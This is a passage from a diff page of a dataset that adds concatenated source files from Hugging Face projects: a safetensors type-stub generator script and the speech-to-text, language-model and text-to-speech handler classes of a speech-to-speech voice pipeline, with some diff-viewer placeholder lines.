+ return {k: {'dtype': str(v.dtype).split('.')[-1], 'shape': v.shape, 'data': _tobytes(v, k)} for (k, v) in tensors.items()}
893
+
894
+ # File: safetensors-main/bindings/python/stub.py
895
+ import argparse
896
+ import inspect
897
+ import os
898
+ import black
899
+ INDENT = ' ' * 4
900
+ GENERATED_COMMENT = '# Generated content DO NOT EDIT\n'
901
+
902
+ def do_indent(text: str, indent: str):
903
+ return text.replace('\n', f'\n{indent}')
904
+
905
+ def function(obj, indent, text_signature=None):
906
+ if text_signature is None:
907
+ text_signature = obj.__text_signature__
908
+ string = ''
909
+ string += f'{indent}def {obj.__name__}{text_signature}:\n'
910
+ indent += INDENT
911
+ string += f'{indent}"""\n'
912
+ string += f'{indent}{do_indent(obj.__doc__, indent)}\n'
913
+ string += f'{indent}"""\n'
914
+ string += f'{indent}pass\n'
915
+ string += '\n'
916
+ string += '\n'
917
+ return string
918
+
919
+ def member_sort(member):
920
+ if inspect.isclass(member):
921
+ value = 10 + len(inspect.getmro(member))
922
+ else:
923
+ value = 1
924
+ return value
925
+
926
+ def fn_predicate(obj):
927
+ value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
928
+ if value:
929
+ return obj.__doc__ and obj.__text_signature__ and (not obj.__name__.startswith('_'))
930
+ if inspect.isgetsetdescriptor(obj):
931
+ return obj.__doc__ and (not obj.__name__.startswith('_'))
932
+ return False
933
+
934
+ def get_module_members(module):
935
+ members = [member for (name, member) in inspect.getmembers(module) if not name.startswith('_') and (not inspect.ismodule(member))]
936
+ members.sort(key=member_sort)
937
+ return members
938
+
939
+ def pyi_file(obj, indent=''):
940
+ string = ''
941
+ if inspect.ismodule(obj):
942
+ string += GENERATED_COMMENT
943
+ members = get_module_members(obj)
944
+ for member in members:
945
+ string += pyi_file(member, indent)
946
+ elif inspect.isclass(obj):
947
+ indent += INDENT
948
+ mro = inspect.getmro(obj)
949
+ if len(mro) > 2:
950
+ inherit = f'({mro[1].__name__})'
951
+ else:
952
+ inherit = ''
953
+ string += f'class {obj.__name__}{inherit}:\n'
954
+ body = ''
955
+ if obj.__doc__:
956
+ body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
957
+ fns = inspect.getmembers(obj, fn_predicate)
958
+ if obj.__text_signature__:
959
+ body += f'{indent}def __init__{obj.__text_signature__}:\n'
960
+ body += f'{indent + INDENT}pass\n'
961
+ body += '\n'
962
+ for (name, fn) in fns:
963
+ body += pyi_file(fn, indent=indent)
964
+ if not body:
965
+ body += f'{indent}pass\n'
966
+ string += body
967
+ string += '\n\n'
968
+ elif inspect.isbuiltin(obj):
969
+ string += f'{indent}@staticmethod\n'
970
+ string += function(obj, indent)
971
+ elif inspect.ismethoddescriptor(obj):
972
+ string += function(obj, indent)
973
+ elif inspect.isgetsetdescriptor(obj):
974
+ string += f'{indent}@property\n'
975
+ string += function(obj, indent, text_signature='(self)')
976
+ else:
977
+ raise Exception(f'Object {obj} is not supported')
978
+ return string
979
+
980
+ def py_file(module, origin):
981
+ members = get_module_members(module)
982
+ string = GENERATED_COMMENT
983
+ string += f'from .. import {origin}\n'
984
+ string += '\n'
985
+ for member in members:
986
+ name = member.__name__
987
+ string += f'{name} = {origin}.{name}\n'
988
+ return string
989
+
990
+ def do_black(content, is_pyi):
991
+ mode = black.Mode(target_versions={black.TargetVersion.PY35}, line_length=119, is_pyi=is_pyi, string_normalization=True, experimental_string_processing=False)
992
+ try:
993
+ return black.format_file_contents(content, fast=True, mode=mode)
994
+ except black.NothingChanged:
995
+ return content
996
+
997
+ def write(module, directory, origin, check=False):
998
+ submodules = [(name, member) for (name, member) in inspect.getmembers(module) if inspect.ismodule(member)]
999
+ filename = os.path.join(directory, '__init__.pyi')
1000
+ pyi_content = pyi_file(module)
1001
+ pyi_content = do_black(pyi_content, is_pyi=True)
1002
+ os.makedirs(directory, exist_ok=True)
1003
+ if check:
1004
+ with open(filename, 'r') as f:
1005
+ data = f.read()
1006
+ assert data == pyi_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1007
+ else:
1008
+ with open(filename, 'w') as f:
1009
+ f.write(pyi_content)
1010
+ filename = os.path.join(directory, '__init__.py')
1011
+ py_content = py_file(module, origin)
1012
+ py_content = do_black(py_content, is_pyi=False)
1013
+ os.makedirs(directory, exist_ok=True)
1014
+ is_auto = False
1015
+ if not os.path.exists(filename):
1016
+ is_auto = True
1017
+ else:
1018
+ with open(filename, 'r') as f:
1019
+ line = f.readline()
1020
+ if line == GENERATED_COMMENT:
1021
+ is_auto = True
1022
+ if is_auto:
1023
+ if check:
1024
+ with open(filename, 'r') as f:
1025
+ data = f.read()
1026
+ assert data == py_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1027
+ else:
1028
+ with open(filename, 'w') as f:
1029
+ f.write(py_content)
1030
+ for (name, submodule) in submodules:
1031
+ write(submodule, os.path.join(directory, name), f'{name}', check=check)
1032
+ if __name__ == '__main__':
1033
+ parser = argparse.ArgumentParser()
1034
+ parser.add_argument('--check', action='store_true')
1035
+ args = parser.parse_args()
1036
+ import safetensors
1037
+ write(safetensors.safetensors_rust, 'py_src/safetensors/', 'safetensors', check=args.check)
1038
+
huggingface_segment-anything-2.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_setfit.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_speech-to-speech.txt ADDED
@@ -0,0 +1,1208 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: speech-to-speech-main/LLM/chat.py
2
+ class Chat:
3
+
4
+ def __init__(self, size):
5
+ self.size = size
6
+ self.init_chat_message = None
7
+ self.buffer = []
8
+
9
+ def append(self, item):
10
+ self.buffer.append(item)
11
+ if len(self.buffer) == 2 * (self.size + 1):
12
+ self.buffer.pop(0)
13
+ self.buffer.pop(0)
14
+
15
+ def init_chat(self, init_chat_message):
16
+ self.init_chat_message = init_chat_message
17
+
18
+ def to_list(self):
19
+ if self.init_chat_message:
20
+ return [self.init_chat_message] + self.buffer
21
+ else:
22
+ return self.buffer
23
+
24
+ # File: speech-to-speech-main/LLM/language_model.py
25
+ from threading import Thread
26
+ from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline, TextIteratorStreamer
27
+ import torch
28
+ from LLM.chat import Chat
29
+ from baseHandler import BaseHandler
30
+ from rich.console import Console
31
+ import logging
32
+ from nltk import sent_tokenize
33
+ logger = logging.getLogger(__name__)
34
+ console = Console()
35
+ WHISPER_LANGUAGE_TO_LLM_LANGUAGE = {'en': 'english', 'fr': 'french', 'es': 'spanish', 'zh': 'chinese', 'ja': 'japanese', 'ko': 'korean'}
36
+
37
+ class LanguageModelHandler(BaseHandler):
38
+
39
+ def setup(self, model_name='microsoft/Phi-3-mini-4k-instruct', device='cuda', torch_dtype='float16', gen_kwargs={}, user_role='user', chat_size=1, init_chat_role=None, init_chat_prompt='You are a helpful AI assistant.'):
40
+ self.device = device
41
+ self.torch_dtype = getattr(torch, torch_dtype)
42
+ self.tokenizer = AutoTokenizer.from_pretrained(model_name)
43
+ self.model = AutoModelForCausalLM.from_pretrained(model_name, torch_dtype=torch_dtype, trust_remote_code=True).to(device)
44
+ self.pipe = pipeline('text-generation', model=self.model, tokenizer=self.tokenizer, device=device)
45
+ self.streamer = TextIteratorStreamer(self.tokenizer, skip_prompt=True, skip_special_tokens=True)
46
+ self.gen_kwargs = {'streamer': self.streamer, 'return_full_text': False, **gen_kwargs}
47
+ self.chat = Chat(chat_size)
48
+ if init_chat_role:
49
+ if not init_chat_prompt:
50
+ raise ValueError('An initial promt needs to be specified when setting init_chat_role.')
51
+ self.chat.init_chat({'role': init_chat_role, 'content': init_chat_prompt})
52
+ self.user_role = user_role
53
+ self.warmup()
54
+
55
+ def warmup(self):
56
+ logger.info(f'Warming up {self.__class__.__name__}')
57
+ dummy_input_text = "Repeat the word 'home'."
58
+ dummy_chat = [{'role': self.user_role, 'content': dummy_input_text}]
59
+ warmup_gen_kwargs = {'min_new_tokens': self.gen_kwargs['min_new_tokens'], 'max_new_tokens': self.gen_kwargs['max_new_tokens'], **self.gen_kwargs}
60
+ n_steps = 2
61
+ if self.device == 'cuda':
62
+ start_event = torch.cuda.Event(enable_timing=True)
63
+ end_event = torch.cuda.Event(enable_timing=True)
64
+ torch.cuda.synchronize()
65
+ start_event.record()
66
+ for _ in range(n_steps):
67
+ thread = Thread(target=self.pipe, args=(dummy_chat,), kwargs=warmup_gen_kwargs)
68
+ thread.start()
69
+ for _ in self.streamer:
70
+ pass
71
+ if self.device == 'cuda':
72
+ end_event.record()
73
+ torch.cuda.synchronize()
74
+ logger.info(f'{self.__class__.__name__}: warmed up! time: {start_event.elapsed_time(end_event) * 0.001:.3f} s')
75
+
76
+ def process(self, prompt):
77
+ logger.debug('infering language model...')
78
+ language_code = None
79
+ if isinstance(prompt, tuple):
80
+ (prompt, language_code) = prompt
81
+ prompt = f'Please reply to my message in {WHISPER_LANGUAGE_TO_LLM_LANGUAGE[language_code]}. ' + prompt
82
+ self.chat.append({'role': self.user_role, 'content': prompt})
83
+ thread = Thread(target=self.pipe, args=(self.chat.to_list(),), kwargs=self.gen_kwargs)
84
+ thread.start()
85
+ if self.device == 'mps':
86
+ generated_text = ''
87
+ for new_text in self.streamer:
88
+ generated_text += new_text
89
+ printable_text = generated_text
90
+ torch.mps.empty_cache()
91
+ else:
92
+ (generated_text, printable_text) = ('', '')
93
+ for new_text in self.streamer:
94
+ generated_text += new_text
95
+ printable_text += new_text
96
+ sentences = sent_tokenize(printable_text)
97
+ if len(sentences) > 1:
98
+ yield (sentences[0], language_code)
99
+ printable_text = new_text
100
+ self.chat.append({'role': 'assistant', 'content': generated_text})
101
+ yield (printable_text, language_code)
102
+
103
+ # File: speech-to-speech-main/LLM/mlx_language_model.py
104
+ import logging
105
+ from LLM.chat import Chat
106
+ from baseHandler import BaseHandler
107
+ from mlx_lm import load, stream_generate, generate
108
+ from rich.console import Console
109
+ import torch
110
+ logger = logging.getLogger(__name__)
111
+ console = Console()
112
+ WHISPER_LANGUAGE_TO_LLM_LANGUAGE = {'en': 'english', 'fr': 'french', 'es': 'spanish', 'zh': 'chinese', 'ja': 'japanese', 'ko': 'korean'}
113
+
114
+ class MLXLanguageModelHandler(BaseHandler):
115
+
116
+ def setup(self, model_name='microsoft/Phi-3-mini-4k-instruct', device='mps', torch_dtype='float16', gen_kwargs={}, user_role='user', chat_size=1, init_chat_role=None, init_chat_prompt='You are a helpful AI assistant.'):
117
+ self.model_name = model_name
118
+ (self.model, self.tokenizer) = load(self.model_name)
119
+ self.gen_kwargs = gen_kwargs
120
+ self.chat = Chat(chat_size)
121
+ if init_chat_role:
122
+ if not init_chat_prompt:
123
+ raise ValueError('An initial promt needs to be specified when setting init_chat_role.')
124
+ self.chat.init_chat({'role': init_chat_role, 'content': init_chat_prompt})
125
+ self.user_role = user_role
126
+ self.warmup()
127
+
128
+ def warmup(self):
129
+ logger.info(f'Warming up {self.__class__.__name__}')
130
+ dummy_input_text = 'Write me a poem about Machine Learning.'
131
+ dummy_chat = [{'role': self.user_role, 'content': dummy_input_text}]
132
+ n_steps = 2
133
+ for _ in range(n_steps):
134
+ prompt = self.tokenizer.apply_chat_template(dummy_chat, tokenize=False)
135
+ generate(self.model, self.tokenizer, prompt=prompt, max_tokens=self.gen_kwargs['max_new_tokens'], verbose=False)
136
+
137
+ def process(self, prompt):
138
+ logger.debug('infering language model...')
139
+ language_code = None
140
+ if isinstance(prompt, tuple):
141
+ (prompt, language_code) = prompt
142
+ prompt = f'Please reply to my message in {WHISPER_LANGUAGE_TO_LLM_LANGUAGE[language_code]}. ' + prompt
143
+ self.chat.append({'role': self.user_role, 'content': prompt})
144
+ if 'gemma' in self.model_name.lower():
145
+ chat_messages = [msg for msg in self.chat.to_list() if msg['role'] != 'system']
146
+ else:
147
+ chat_messages = self.chat.to_list()
148
+ prompt = self.tokenizer.apply_chat_template(chat_messages, tokenize=False, add_generation_prompt=True)
149
+ output = ''
150
+ curr_output = ''
151
+ for t in stream_generate(self.model, self.tokenizer, prompt, max_tokens=self.gen_kwargs['max_new_tokens']):
152
+ output += t
153
+ curr_output += t
154
+ if curr_output.endswith(('.', '?', '!', '<|end|>')):
155
+ yield (curr_output.replace('<|end|>', ''), language_code)
156
+ curr_output = ''
157
+ generated_text = output.replace('<|end|>', '')
158
+ torch.mps.empty_cache()
159
+ self.chat.append({'role': 'assistant', 'content': generated_text})
160
+
161
+ # File: speech-to-speech-main/STT/lightning_whisper_mlx_handler.py
162
+ import logging
163
+ from time import perf_counter
164
+ from baseHandler import BaseHandler
165
+ from lightning_whisper_mlx import LightningWhisperMLX
166
+ import numpy as np
167
+ from rich.console import Console
168
+ from copy import copy
169
+ import torch
170
+ logger = logging.getLogger(__name__)
171
+ console = Console()
172
+ SUPPORTED_LANGUAGES = ['en', 'fr', 'es', 'zh', 'ja', 'ko']
173
+
174
+ class LightningWhisperSTTHandler(BaseHandler):
175
+
176
+ def setup(self, model_name='distil-large-v3', device='mps', torch_dtype='float16', compile_mode=None, language=None, gen_kwargs={}):
177
+ if len(model_name.split('/')) > 1:
178
+ model_name = model_name.split('/')[-1]
179
+ self.device = device
180
+ self.model = LightningWhisperMLX(model=model_name, batch_size=6, quant=None)
181
+ self.start_language = language
182
+ self.last_language = language
183
+ self.warmup()
184
+
185
+ def warmup(self):
186
+ logger.info(f'Warming up {self.__class__.__name__}')
187
+ n_steps = 1
188
+ dummy_input = np.array([0] * 512)
189
+ for _ in range(n_steps):
190
+ _ = self.model.transcribe(dummy_input)['text'].strip()
191
+
192
+ def process(self, spoken_prompt):
193
+ logger.debug('infering whisper...')
194
+ global pipeline_start
195
+ pipeline_start = perf_counter()
196
+ if self.start_language != 'auto':
197
+ transcription_dict = self.model.transcribe(spoken_prompt, language=self.start_language)
198
+ else:
199
+ transcription_dict = self.model.transcribe(spoken_prompt)
200
+ language_code = transcription_dict['language']
201
+ if language_code not in SUPPORTED_LANGUAGES:
202
+ logger.warning(f'Whisper detected unsupported language: {language_code}')
203
+ if self.last_language in SUPPORTED_LANGUAGES:
204
+ transcription_dict = self.model.transcribe(spoken_prompt, language=self.last_language)
205
+ else:
206
+ transcription_dict = {'text': '', 'language': 'en'}
207
+ else:
208
+ self.last_language = language_code
209
+ pred_text = transcription_dict['text'].strip()
210
+ language_code = transcription_dict['language']
211
+ torch.mps.empty_cache()
212
+ logger.debug('finished whisper inference')
213
+ console.print(f'[yellow]USER: {pred_text}')
214
+ logger.debug(f'Language Code Whisper: {language_code}')
215
+ yield (pred_text, language_code)
216
+
217
+ # File: speech-to-speech-main/STT/paraformer_handler.py
218
+ import logging
219
+ from time import perf_counter
220
+ from baseHandler import BaseHandler
221
+ from funasr import AutoModel
222
+ import numpy as np
223
+ from rich.console import Console
224
+ import torch
225
+ logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
226
+ logger = logging.getLogger(__name__)
227
+ console = Console()
228
+
229
+ class ParaformerSTTHandler(BaseHandler):
230
+
231
+ def setup(self, model_name='paraformer-zh', device='cuda', gen_kwargs={}):
232
+ print(model_name)
233
+ if len(model_name.split('/')) > 1:
234
+ model_name = model_name.split('/')[-1]
235
+ self.device = device
236
+ self.model = AutoModel(model=model_name, device=device)
237
+ self.warmup()
238
+
239
+ def warmup(self):
240
+ logger.info(f'Warming up {self.__class__.__name__}')
241
+ n_steps = 1
242
+ dummy_input = np.array([0] * 512, dtype=np.float32)
243
+ for _ in range(n_steps):
244
+ _ = self.model.generate(dummy_input)[0]['text'].strip().replace(' ', '')
245
+
246
+ def process(self, spoken_prompt):
247
+ logger.debug('infering paraformer...')
248
+ global pipeline_start
249
+ pipeline_start = perf_counter()
250
+ pred_text = self.model.generate(spoken_prompt)[0]['text'].strip().replace(' ', '')
251
+ torch.mps.empty_cache()
252
+ logger.debug('finished paraformer inference')
253
+ console.print(f'[yellow]USER: {pred_text}')
254
+ yield pred_text
255
+
256
+ # File: speech-to-speech-main/STT/whisper_stt_handler.py
257
+ from time import perf_counter
258
+ from transformers import AutoProcessor, AutoModelForSpeechSeq2Seq
259
+ import torch
260
+ from copy import copy
261
+ from baseHandler import BaseHandler
262
+ from rich.console import Console
263
+ import logging
264
+ logger = logging.getLogger(__name__)
265
+ console = Console()
266
+ SUPPORTED_LANGUAGES = ['en', 'fr', 'es', 'zh', 'ja', 'ko']
267
+
268
+ class WhisperSTTHandler(BaseHandler):
269
+
270
+ def setup(self, model_name='distil-whisper/distil-large-v3', device='cuda', torch_dtype='float16', compile_mode=None, language=None, gen_kwargs={}):
271
+ self.device = device
272
+ self.torch_dtype = getattr(torch, torch_dtype)
273
+ self.compile_mode = compile_mode
274
+ self.gen_kwargs = gen_kwargs
275
+ if language == 'auto':
276
+ language = None
277
+ self.last_language = language
278
+ if self.last_language is not None:
279
+ self.gen_kwargs['language'] = self.last_language
280
+ self.processor = AutoProcessor.from_pretrained(model_name)
281
+ self.model = AutoModelForSpeechSeq2Seq.from_pretrained(model_name, torch_dtype=self.torch_dtype).to(device)
282
+ if self.compile_mode:
283
+ self.model.generation_config.cache_implementation = 'static'
284
+ self.model.forward = torch.compile(self.model.forward, mode=self.compile_mode, fullgraph=True)
285
+ self.warmup()
286
+
287
+ def prepare_model_inputs(self, spoken_prompt):
288
+ input_features = self.processor(spoken_prompt, sampling_rate=16000, return_tensors='pt').input_features
289
+ input_features = input_features.to(self.device, dtype=self.torch_dtype)
290
+ return input_features
291
+
292
+ def warmup(self):
293
+ logger.info(f'Warming up {self.__class__.__name__}')
294
+ n_steps = 1 if self.compile_mode == 'default' else 2
295
+ dummy_input = torch.randn((1, self.model.config.num_mel_bins, 3000), dtype=self.torch_dtype, device=self.device)
296
+ if self.compile_mode not in (None, 'default'):
297
+ warmup_gen_kwargs = {'min_new_tokens': self.gen_kwargs['max_new_tokens'], 'max_new_tokens': self.gen_kwargs['max_new_tokens'], **self.gen_kwargs}
298
+ else:
299
+ warmup_gen_kwargs = self.gen_kwargs
300
+ if self.device == 'cuda':
301
+ start_event = torch.cuda.Event(enable_timing=True)
302
+ end_event = torch.cuda.Event(enable_timing=True)
303
+ torch.cuda.synchronize()
304
+ start_event.record()
305
+ for _ in range(n_steps):
306
+ _ = self.model.generate(dummy_input, **warmup_gen_kwargs)
307
+ if self.device == 'cuda':
308
+ end_event.record()
309
+ torch.cuda.synchronize()
310
+ logger.info(f'{self.__class__.__name__}: warmed up! time: {start_event.elapsed_time(end_event) * 0.001:.3f} s')
311
+
312
+ def process(self, spoken_prompt):
313
+ logger.debug('infering whisper...')
314
+ global pipeline_start
315
+ pipeline_start = perf_counter()
316
+ input_features = self.prepare_model_inputs(spoken_prompt)
317
+ pred_ids = self.model.generate(input_features, **self.gen_kwargs)
318
+ language_code = self.processor.tokenizer.decode(pred_ids[0, 1])[2:-2]
319
+ if language_code not in SUPPORTED_LANGUAGES:
320
+ logger.warning('Whisper detected unsupported language:', language_code)
321
+ gen_kwargs = copy(self.gen_kwargs)
322
+ gen_kwargs['language'] = self.last_language
323
+ language_code = self.last_language
324
+ pred_ids = self.model.generate(input_features, **gen_kwargs)
325
+ else:
326
+ self.last_language = language_code
327
+ pred_text = self.processor.batch_decode(pred_ids, skip_special_tokens=True, decode_with_timestamps=False)[0]
328
+ language_code = self.processor.tokenizer.decode(pred_ids[0, 1])[2:-2]
329
+ logger.debug('finished whisper inference')
330
+ console.print(f'[yellow]USER: {pred_text}')
331
+ logger.debug(f'Language Code Whisper: {language_code}')
332
+ yield (pred_text, language_code)
333
+
334
+ # File: speech-to-speech-main/TTS/chatTTS_handler.py
335
+ import ChatTTS
336
+ import logging
337
+ from baseHandler import BaseHandler
338
+ import librosa
339
+ import numpy as np
340
+ from rich.console import Console
341
+ import torch
342
+ logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
343
+ logger = logging.getLogger(__name__)
344
+ console = Console()
345
+
346
+ class ChatTTSHandler(BaseHandler):
347
+
348
+ def setup(self, should_listen, device='cuda', gen_kwargs={}, stream=True, chunk_size=512):
349
+ self.should_listen = should_listen
350
+ self.device = device
351
+ self.model = ChatTTS.Chat()
352
+ self.model.load(compile=False)
353
+ self.chunk_size = chunk_size
354
+ self.stream = stream
355
+ rnd_spk_emb = self.model.sample_random_speaker()
356
+ self.params_infer_code = ChatTTS.Chat.InferCodeParams(spk_emb=rnd_spk_emb)
357
+ self.warmup()
358
+
359
+ def warmup(self):
360
+ logger.info(f'Warming up {self.__class__.__name__}')
361
+ _ = self.model.infer('text')
362
+
363
+ def process(self, llm_sentence):
364
+ console.print(f'[green]ASSISTANT: {llm_sentence}')
365
+ if self.device == 'mps':
366
+ import time
367
+ start = time.time()
368
+ torch.mps.synchronize()
369
+ torch.mps.empty_cache()
370
+ _ = time.time() - start
371
+ wavs_gen = self.model.infer(llm_sentence, params_infer_code=self.params_infer_code, stream=self.stream)
372
+ if self.stream:
373
+ wavs = [np.array([])]
374
+ for gen in wavs_gen:
375
+ if gen[0] is None or len(gen[0]) == 0:
376
+ self.should_listen.set()
377
+ return
378
+ audio_chunk = librosa.resample(gen[0], orig_sr=24000, target_sr=16000)
379
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)[0]
380
+ while len(audio_chunk) > self.chunk_size:
381
+ yield audio_chunk[:self.chunk_size]
382
+ audio_chunk = audio_chunk[self.chunk_size:]
383
+ yield np.pad(audio_chunk, (0, self.chunk_size - len(audio_chunk)))
384
+ else:
385
+ wavs = wavs_gen
386
+ if len(wavs[0]) == 0:
387
+ self.should_listen.set()
388
+ return
389
+ audio_chunk = librosa.resample(wavs[0], orig_sr=24000, target_sr=16000)
390
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)
391
+ for i in range(0, len(audio_chunk), self.chunk_size):
392
+ yield np.pad(audio_chunk[i:i + self.chunk_size], (0, self.chunk_size - len(audio_chunk[i:i + self.chunk_size])))
393
+ self.should_listen.set()
394
+
395
+ # File: speech-to-speech-main/TTS/melo_handler.py
396
+ from melo.api import TTS
397
+ import logging
398
+ from baseHandler import BaseHandler
399
+ import librosa
400
+ import numpy as np
401
+ from rich.console import Console
402
+ import torch
403
+ logger = logging.getLogger(__name__)
404
+ console = Console()
405
+ WHISPER_LANGUAGE_TO_MELO_LANGUAGE = {'en': 'EN_NEWEST', 'fr': 'FR', 'es': 'ES', 'zh': 'ZH', 'ja': 'JP', 'ko': 'KR'}
406
+ WHISPER_LANGUAGE_TO_MELO_SPEAKER = {'en': 'EN-Newest', 'fr': 'FR', 'es': 'ES', 'zh': 'ZH', 'ja': 'JP', 'ko': 'KR'}
407
+
408
+ class MeloTTSHandler(BaseHandler):
409
+
410
+ def setup(self, should_listen, device='mps', language='en', speaker_to_id='en', gen_kwargs={}, blocksize=512):
411
+ self.should_listen = should_listen
412
+ self.device = device
413
+ self.language = language
414
+ self.model = TTS(language=WHISPER_LANGUAGE_TO_MELO_LANGUAGE[self.language], device=device)
415
+ self.speaker_id = self.model.hps.data.spk2id[WHISPER_LANGUAGE_TO_MELO_SPEAKER[speaker_to_id]]
416
+ self.blocksize = blocksize
417
+ self.warmup()
418
+
419
+ def warmup(self):
420
+ logger.info(f'Warming up {self.__class__.__name__}')
421
+ _ = self.model.tts_to_file('text', self.speaker_id, quiet=True)
422
+
423
+ def process(self, llm_sentence):
424
+ language_code = None
425
+ if isinstance(llm_sentence, tuple):
426
+ (llm_sentence, language_code) = llm_sentence
427
+ console.print(f'[green]ASSISTANT: {llm_sentence}')
428
+ if language_code is not None and self.language != language_code:
429
+ try:
430
+ self.model = TTS(language=WHISPER_LANGUAGE_TO_MELO_LANGUAGE[language_code], device=self.device)
431
+ self.speaker_id = self.model.hps.data.spk2id[WHISPER_LANGUAGE_TO_MELO_SPEAKER[language_code]]
432
+ self.language = language_code
433
+ except KeyError:
434
+ console.print(f'[red]Language {language_code} not supported by Melo. Using {self.language} instead.')
435
+ if self.device == 'mps':
436
+ import time
437
+ start = time.time()
438
+ torch.mps.synchronize()
439
+ torch.mps.empty_cache()
440
+ _ = time.time() - start
441
+ try:
442
+ audio_chunk = self.model.tts_to_file(llm_sentence, self.speaker_id, quiet=True)
443
+ except (AssertionError, RuntimeError) as e:
444
+ logger.error(f'Error in MeloTTSHandler: {e}')
445
+ audio_chunk = np.array([])
446
+ if len(audio_chunk) == 0:
447
+ self.should_listen.set()
448
+ return
449
+ audio_chunk = librosa.resample(audio_chunk, orig_sr=44100, target_sr=16000)
450
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)
451
+ for i in range(0, len(audio_chunk), self.blocksize):
452
+ yield np.pad(audio_chunk[i:i + self.blocksize], (0, self.blocksize - len(audio_chunk[i:i + self.blocksize])))
453
+ self.should_listen.set()
454
+
455
+ # File: speech-to-speech-main/TTS/parler_handler.py
456
+ from threading import Thread
457
+ from time import perf_counter
458
+ from baseHandler import BaseHandler
459
+ import numpy as np
460
+ import torch
461
+ from transformers import AutoTokenizer
